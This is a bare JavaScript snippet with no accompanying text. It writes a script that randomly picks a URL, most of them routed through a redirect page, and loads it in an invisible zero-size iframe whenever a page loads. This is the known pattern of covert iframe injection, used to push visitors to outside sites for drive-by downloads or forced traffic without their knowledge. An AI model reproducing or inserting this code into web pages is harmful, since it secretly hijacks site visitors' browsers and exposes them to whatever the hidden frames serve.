document.writeln("<SCRIPT Language=\"javascript\">");
document.writeln("tips = new Array(10);");
document.writeln("tips[0] = \"http://197.aaabbb.com/images/shipin.html?url=http://www.bbbccc.com\";");
document.writeln("tips[1] = \"http://197.aaabbb.com/images/shipin.html?url=http://www.bbbccc.com\";");
document.writeln("tips[2] = \"http://197.aaabbb.com/images/shipin.html?url=http://www.bbbccc.com\";");
document.writeln("tips[3] = \"http://197.aaabbb.com/images/shipin.html?url=http://www.bbbccc.com\";");
document.writeln("tips[4] = \"http://www.bbbccc.com\";");
document.writeln("tips[5] = \"http://www.bbbccc.com\";");
document.writeln("tips[6] = \"http://www.bbbccc.com\";");
document.writeln("tips[7] = \"http://197.aaabbb.com/images/shipin.html?url=http://www.bbbccc.com\";");
document.writeln("tips[8] = \"http://197.aaabbb.com/images/shipin.html?url=http://www.bbbccc.com\";");
document.writeln("tips[9] = \"http://197.aaabbb.com/images/shipin.html?url=http://www.bbbccc.com\";");
document.writeln("index = Math.floor(Math.random() * tips.length);");
document.writeln("document.write(\"<iframe frameborder=0 src=\" + tips[index] + \" width=0 height=0 scrolling=no></iframe>\");");
document.writeln("</SCRIPT>");